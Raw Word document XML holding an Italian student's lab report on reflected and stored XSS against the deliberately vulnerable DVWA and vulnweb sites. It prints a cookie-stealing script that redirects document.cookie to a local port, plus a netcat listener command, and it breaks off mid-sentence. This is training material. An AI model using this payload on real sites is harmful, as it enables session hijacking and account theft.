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0E7" w:rsidRPr="003658EE" w:rsidRDefault="002E40E7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Traccia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRDefault="002E40E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lo scopo dell'esercizio è quello di usare l’attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> per rubare i cookie di sessione alla macchina DVWA, tramite uno script. Dobbiamo creare una situazione in cui abbiamo una macchina vittima (DVWA), che cliccherà sul link malevolo (XSS), e una macchina che riceve i cookie, nel nostro caso creiamo una sessione aperta con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00092055" w:rsidRPr="003658EE" w:rsidRDefault="00092055">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRDefault="002E40E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>● Spiegare come si comprende che un sito è vulnerabile</w:t>
      </w:r>
      <w:r w:rsidR="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRDefault="003658EE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRPr="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Come capire se un sito web è vulnerabile o meno? Dobbiamo constatare se questo esegue o meno uno script. </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Per fare questo u</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">siamo come esempio il sito </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnweb </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>per testare in sicurezza un paio di metodi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nel primo abbiamo inserito la parola </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>gatto</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> prima senza e poi con la keyword </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&lt;i&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a precederla, come possiamo vedere questa viene eseguita</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> senza problemi</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> cambiando il carattere in corsivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658E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24352" cy="46107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t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019" cy="46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     </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="540"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5115560" cy="4625352"/>
            <wp:effectExtent l="0" t="0" r="889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tto corsiv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226" cy="464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EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Un altro esempio</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> inseriamo uno script, es </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&lt;script&lt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>10):&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> e proviamo ad eseguirlo. Come si può vedere appare un pop up con il numero da noi inserito nello script di alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRPr="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658E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97525" cy="4131314"/>
            <wp:effectExtent l="0" t="0" r="3175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451" cy="413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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6247484" cy="2660584"/>
            <wp:effectExtent l="0" t="0" r="127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563" cy="267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8EE" w:rsidRPr="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRPr="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Questo succede perché non si è andati a sanare gli input che l’utente può inserire e quindi </w:t>
      </w:r>
      <w:r w:rsidR="002C0E09">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">il sito </w:t>
      </w:r>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">accetta ed esegue tutto quello che gli viene scritto. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRPr="003658EE" w:rsidRDefault="003658EE" w:rsidP="003658EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Così facendo accetterà anche script malevoli e questo è molto pericoloso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRPr="003658EE" w:rsidRDefault="003658EE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003658EE" w:rsidRPr="003658EE" w:rsidRDefault="002E40E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003658EE">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>● Portare l’attacco XSS</w:t>
      </w:r>
      <w:r w:rsidR="00A906B3">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576CED" w:rsidRPr="00576CED" w:rsidRDefault="00913B6F" w:rsidP="00A906B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="002C0E09">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="002C0E09">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> è una vulnerabilità di sicurezza che si verifica nelle applicazioni web quando l'input fornito dagli utenti non viene filtrato o sanificato correttamente prima di essere incluso nelle pagine web e restituito ai client. Questa vulnerabilità consente agli attaccanti di eseguire script malevoli nel browser degli utenti.</w:t>
      </w:r>
      <w:r w:rsidR="00576CED" w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se ne distinguono di due tipi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00913B6F" w:rsidRPr="00576CED" w:rsidRDefault="00576CED" w:rsidP="00576CED">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Riflesso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>il payload malevolo viene incorporato nella richiesta HTTP e restituito immediatamente nella risposta.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00913B6F" w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Il</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00913B6F" w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload non è memorizzato permanentemente sul server, ma viene riflesso (ritornato) nell'output HTML. Gli attaccanti spesso sfruttano link malevoli, phishing o altri vettori per convincere le vittime a fare clic su un URL contenente il payload XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00913B6F" w:rsidRPr="00576CED" w:rsidRDefault="00576CED" w:rsidP="00576CED">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Memorizzato (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00913B6F" w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>il payload malevolo viene immagazzinato (memorizzato) permanentemente sul server, spesso in un database. Quando un utente accede a una pagina che recupera il payload memorizzato, questo viene restituito nella risposta HTML e eseguito nel browser dell'utente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRPr="00576CED" w:rsidRDefault="00576CED" w:rsidP="00A906B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nell’esercitazione di oggi siamo andati a simulare un attacco di tipo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">iflesso per rubare </w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (che ricordiamo essere </w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>piccoli pezzi di dati memorizzati sul computer o sul dispositivo di un utente durante la navigazione su un sito web. Questi file contengono informazioni che possono essere recuperate e utilizzate dal sito stesso o da siti di terze parti</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), alla macchina DVWA attraverso uno </w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Script</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>un insieme di istruzioni o comandi scritti in un linguaggio di scripting per eseguire specifiche azioni su un computer o in un ambiente di sviluppo software</w:t>
      </w:r>
      <w:r w:rsidRPr="00576CED">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D21E6B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A906B3" w:rsidRDefault="00D21E6B" w:rsidP="00A906B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Script utilizzato:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A906B3" w:rsidRPr="00A906B3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A906B3" w:rsidRPr="00A906B3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A906B3" w:rsidRPr="00A906B3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>='http://127.0.0.1:8888/?cookie='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A906B3" w:rsidRDefault="00D21E6B" w:rsidP="00A906B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Mettiamoci in ascolto attraverso il comando</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A906B3" w:rsidRPr="00A906B3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A906B3" w:rsidRPr="00A906B3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l -p 8888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0E09">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>NetCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRPr="00A906B3" w:rsidRDefault="00D21E6B" w:rsidP="00A906B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A906B3" w:rsidRDefault="00A906B3" w:rsidP="00A906B3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A906B3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D23187F" wp14:editId="23573C17">
            <wp:extent cx="10565130" cy="4904404"/>
            <wp:effectExtent l="0" t="0" r="762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9263" cy="49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6B" w:rsidRDefault="00D21E6B" w:rsidP="00A906B3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRPr="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00A906B3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="002C0E09" w:rsidP="00D21E6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Proviamo</w:t>
      </w:r>
      <w:r w:rsidR="00D21E6B" w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> la stessa cosa ma </w:t>
      </w:r>
      <w:r w:rsidR="00D21E6B" w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">usando l’attacco </w:t>
      </w:r>
      <w:r w:rsidR="00D21E6B" w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D21E6B" w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>La prima cosa da fare è cambiare il numero massimo di caratteri inseribili all’interno del messaggio, dai 50 di default cambiamo ad es. in 300 (evidenziato in giallo).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59837DFC" wp14:editId="0C28B58C">
            <wp:extent cx="7064002" cy="3931920"/>
            <wp:effectExtent l="0" t="0" r="381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6189" cy="394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6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>A questo punto, inseriamo il nostro script e eseguiamo l’attacco</w:t>
      </w:r>
      <w:r w:rsidR="007D3DEE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>. La pagina, a seguito di q</w:t>
      </w:r>
      <w:r w:rsidR="00092055">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ue</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="007D3DEE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">st’ultimo, risulterà inaccessibile e </w:t>
      </w:r>
      <w:r w:rsidR="002A6346">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">resterà </w:t>
      </w:r>
      <w:r w:rsidR="007D3DEE">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in questo stato in maniera </w:t>
      </w:r>
      <w:r w:rsidR="002A6346">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
